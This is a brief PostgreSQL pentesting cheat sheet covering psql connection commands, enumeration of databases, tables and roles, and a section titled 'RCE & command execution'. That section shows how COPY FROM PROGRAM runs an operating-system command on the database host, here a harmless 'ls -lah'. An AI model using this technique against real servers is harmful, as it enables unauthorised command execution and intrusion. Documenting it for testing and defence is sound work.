Connect & Basic Enum

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> <database> # Remote connection speocify port

Enumerate databases and tables

\\list # List databases
\\c <database> # use the database
\\d # List tables

Enumerate users roles

\\du+

RCE & command execution

Since version 9.3, only super users and member of the group pg_execute_server_program can use copy for RCE:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'ls -lah';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;